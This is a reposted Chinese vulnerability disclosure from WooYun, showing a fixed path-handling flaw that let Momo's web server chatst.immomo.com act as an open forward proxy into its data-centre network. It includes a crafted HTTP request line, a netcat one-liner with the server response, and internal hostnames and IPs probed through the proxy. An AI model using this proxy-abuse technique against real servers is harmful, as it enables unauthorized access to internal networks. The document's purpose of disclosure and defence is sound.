神刀安全网

漏洞标题: 陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网)

漏洞详情

披露状态:

2016-03-31: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-08: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

陌陌一台web服务器Path处理不当,可以正向代理,是idc的机器,可以在idc内穿,但打不到办公网。 (┬_┬)

详细说明:

存在问题的web服务器是 chatst.immomo.com:80

code 区域
GET :@www.lijiejie.com/xss.js HTTP/1.1
Host: chatst.immomo.com

漏洞标题:  陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网)

如图,已经可以代理访问www.lijiejie.com

漏洞证明:

code 区域
[email protected]:~/test# echo -e "GET :@www.lijiejie.com/xss.js HTTP/1.1/r/nHost: chatst.immomo.com/r/n/r/n" | nc chatst.immomo.com 80
HTTP/1.1 200 OK
Content-Length: 51
Expires: Tue, 27 Sep 2016 08:22:10 GMT
Server: MOMO
Last-Modified: Tue, 26 Jan 2016 07:40:04 GMT
Cache-Control: max-age=15552000
Date: Thu, 31 Mar 2016 08:22:09 GMT
Content-Type: application/octet-stream

alert('XSS on ' + document.domain + '/n' + Date())

测试了几个IP地址,办公网打不通:

code 区域
office.wemomo.com              172.16.7.3
hermes.wemomo.com 10.80.103.160

但还是找了个不通的:

code 区域
maven.wemomo.com               211.152.99.47

大家无法直接访问http://maven.wemomo.com的web服务,但是代理OK的。

漏洞标题:  陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网)

修复方案:

web server正确处理path

版权声明:转载请注明来源 lijiejie@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮